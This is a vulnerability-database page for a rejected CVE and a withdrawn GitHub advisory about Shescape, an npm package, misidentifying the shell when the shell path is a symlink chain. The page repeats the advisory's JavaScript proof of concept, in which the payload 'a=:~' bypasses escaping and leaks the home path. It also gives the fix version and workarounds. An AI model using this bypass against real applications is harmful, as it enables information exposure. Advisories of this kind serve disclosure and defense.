Vulnerability-Lookup

CVE-2026-30916 (GCVE-0-2026-30916)

Vulnerability from cvelistv5 – Published: 2026-03-09 22:48 – Updated: 2026-03-20 19:50

** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. Reason: Further investigation determined that the software behavior described did not falls within the project's threat model. See https://github.com/github/advisory-database/pull/7206 for more information.

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "cna": {
      "providerMetadata": {
        "dateUpdated": "2026-03-20T19:50:13.932Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "rejectedReasons": [
        {
          "lang": "en",
          "value": "** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. Reason: Further investigation determined that the software behavior described did not falls within the project\u0027s threat model. See https://github.com/github/advisory-database/pull/7206 for more information."
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-30916",
    "datePublished": "2026-03-09T22:48:14.873Z",
    "dateRejected": "2026-03-20T19:50:13.932Z",
    "dateReserved": "2026-03-07T16:40:05.884Z",
    "dateUpdated": "2026-03-20T19:50:13.932Z",
    "state": "REJECTED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-30916\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-10T17:40:15.363\",\"lastModified\":\"2026-03-20T20:16:47.593\",\"vulnStatus\":\"Rejected\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Rejected reason: ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. Reason: Further investigation determined that the software behavior described did not falls within the project\u0027s threat model. See https://github.com/github/advisory-database/pull/7206 for more information.\"}],\"metrics\":{},\"references\":[]}}",
    "vulnrichment": {
      "containers": "{\"cna\": {\"rejectedReasons\": [{\"lang\": \"en\", \"value\": \"** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. Reason: Further investigation determined that the software behavior described did not falls within the project\u0027s threat model. See https://github.com/github/advisory-database/pull/7206 for more information.\"}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-20T19:50:13.932Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-30916\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"state\": \"REJECTED\", \"assignerShortName\": \"GitHub_M\", \"dateReserved\": \"2026-03-07T16:40:05.884Z\", \"datePublished\": \"2026-03-09T22:48:14.873Z\", \"dateUpdated\": \"2026-03-20T19:50:13.932Z\", \"dateRejected\": \"2026-03-20T19:50:13.932Z\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

GHSA-6F6W-6J58-RQ76

Vulnerability from github – Published: 2026-03-07 02:31 – Updated: 2026-03-20 19:53

Summary

Withdrawn Advisory: Shescape has possible misidentification of shell due to link chains

Details

Withdrawn Advisory

This advisory has been withdrawn because it falls outside the https://github.com/ericcornelissen/shescape/blob/a2544a1c78cae19d0e81a485b997bf0b0fcc2c12/SECURITY.md#threat-model. This link is maintained to preserve external references.

Original Description

Impact

This impacts users of Shescape that configure their shell to point to a file on disk that is a link to a link. The precise result of being affected depends on the actual shell used and incorrect shell identified by Shescape.

In particular, an attacker may be able to bypass escaping for the shell being used. This can result, for example, in exposure of sensitive information, consider the following proof of concept (targeting Shescape v2):

import fs from "node:fs";
import { exec } from "node:child_process";

import { Shescape } from "shescape";
import which from "which";

/* 1. Set up */
const shell = which.sync("bash");
const linkToShell = "./csh";
const linkToLink = "./link";

fs.rmSync(linkToLink, { force: true });
fs.rmSync(linkToShell, { force: true });
fs.symlinkSync(shell, linkToShell);
fs.symlinkSync(linkToShell, linkToLink);

/* 2. Misconfiguration */
const execOptions = {
  shell: linkToLink,
};

const shescape = new Shescape({
  shell: execOptions.shell,
});

/* 3. Payload */
const userInput = "a=:~";

/* 4. Attack example */
exec(
  `echo Hello ${shescape.escape(userInput)}`,
  { shell: execOptions.shell },
  (error, stdout) => {
    fs.rmSync(linkToLink);
    fs.rmSync(linkToShell);

    if (error) {
      console.error(`An error occurred: ${error}`);
    } else {
      console.log(stdout);
      // Output:  "Hello a=:/home/user"
    }
  },
);

Patches

This problem has been patched in v2.1.9 which you can upgrade to now.

Workarounds

If upgrading is not an option, either avoid using a shell or make sure the shell path you use is not a link to a link.

References

Shescape Pull Request #2388
Shescape Release v2.1.9

For more information

Comment on Pull Request #2388
Open an issue at https://github.com/ericcornelissen/shescape/issues (New issue > Question)

Severity ?

2.9 (Low)


                  
                    CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.1.8"
      },
      "package": {
        "ecosystem": "npm",
        "name": "shescape"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.1.9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-30916"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-200"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-07T02:31:58Z",
    "nvd_published_at": "2026-03-10T17:40:15Z",
    "severity": "LOW"
  },
  "details": "## Withdrawn Advisory\n\nThis advisory has been withdrawn because it falls outside the https://github.com/ericcornelissen/shescape/blob/a2544a1c78cae19d0e81a485b997bf0b0fcc2c12/SECURITY.md#threat-model. This link is maintained to preserve external references.\n\n## Original Description\n### Impact\n\nThis impacts users of Shescape that configure their `shell` to point to a file on disk that is a link to a link. The precise result of being affected depends on the actual shell used and incorrect shell identified by Shescape.\n\nIn particular, an attacker may be able to bypass escaping for the shell being used. This can result, for example, in exposure of sensitive information, consider the following proof of concept (targeting Shescape v2):\n\n```javascript\nimport fs from \"node:fs\";\nimport { exec } from \"node:child_process\";\n\nimport { Shescape } from \"shescape\";\nimport which from \"which\";\n\n/* 1. Set up */\nconst shell = which.sync(\"bash\");\nconst linkToShell = \"./csh\";\nconst linkToLink = \"./link\";\n\nfs.rmSync(linkToLink, { force: true });\nfs.rmSync(linkToShell, { force: true });\nfs.symlinkSync(shell, linkToShell);\nfs.symlinkSync(linkToShell, linkToLink);\n\n/* 2. Misconfiguration */\nconst execOptions = {\n  shell: linkToLink,\n};\n\nconst shescape = new Shescape({\n  shell: execOptions.shell,\n});\n\n/* 3. Payload */\nconst userInput = \"a=:~\";\n\n/* 4. Attack example */\nexec(\n  `echo Hello ${shescape.escape(userInput)}`,\n  { shell: execOptions.shell },\n  (error, stdout) =\u003e {\n    fs.rmSync(linkToLink);\n    fs.rmSync(linkToShell);\n\n    if (error) {\n      console.error(`An error occurred: ${error}`);\n    } else {\n      console.log(stdout);\n      // Output:  \"Hello a=:/home/user\"\n    }\n  },\n);\n```\n\n### Patches\n\nThis problem has been patched in [v2.1.9](https://www.npmjs.com/package/shescape/v/2.1.9) which you can upgrade to now.\n\n### Workarounds\n\nIf upgrading is not an option, either avoid using a shell or make sure the shell path you use is not a link to a link.\n\n### References\n\n- Shescape Pull Request [#2388](https://github.com/ericcornelissen/shescape/pull/2388)\n- Shescape Release [v2.1.9](https://github.com/ericcornelissen/shescape/releases/tag/v2.1.9)\n\n### For more information\n\n- Comment on Pull Request [#2388](https://github.com/ericcornelissen/shescape/pull/2388)\n- Open an issue at \u003chttps://github.com/ericcornelissen/shescape/issues\u003e (New issue \u003e Question)",
  "id": "GHSA-6f6w-6j58-rq76",
  "modified": "2026-03-20T19:53:41Z",
  "published": "2026-03-07T02:31:58Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/ericcornelissen/shescape/security/advisories/GHSA-6f6w-6j58-rq76"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30916"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ericcornelissen/shescape/pull/2388"
    },
    {
      "type": "WEB",
      "url": "https://github.com/github/advisory-database/pull/7206"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/ericcornelissen/shescape"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ericcornelissen/shescape/releases/tag/v2.1.9"
    },
    {
      "type": "WEB",
      "url": "https://www.npmjs.com/package/shescape/v/2.1.9"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Withdrawn Advisory: Shescape has possible misidentification of shell due to link chains",
  "withdrawn": "2026-03-20T19:53:41Z"
}

FKIE_CVE-2026-30916

Vulnerability from fkie_nvd - Published: 2026-03-10 17:40 - Updated: 2026-03-20 20:16

Severity ?

Summary

Rejected reason: ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. Reason: Further investigation determined that the software behavior described did not falls within the project's threat model. See https://github.com/github/advisory-database/pull/7206 for more information.

References

	URL	Tags

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Rejected reason: ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. Reason: Further investigation determined that the software behavior described did not falls within the project\u0027s threat model. See https://github.com/github/advisory-database/pull/7206 for more information."
    }
  ],
  "id": "CVE-2026-30916",
  "lastModified": "2026-03-20T20:16:47.593",
  "metrics": {},
  "published": "2026-03-10T17:40:15.363",
  "references": [],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Rejected"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-30916 (GCVE-0-2026-30916)

GHSA-6F6W-6J58-RQ76

Withdrawn Advisory

Original Description

Impact

Patches

Workarounds

References

For more information

FKIE_CVE-2026-30916

Tags

Sightings

Nomenclature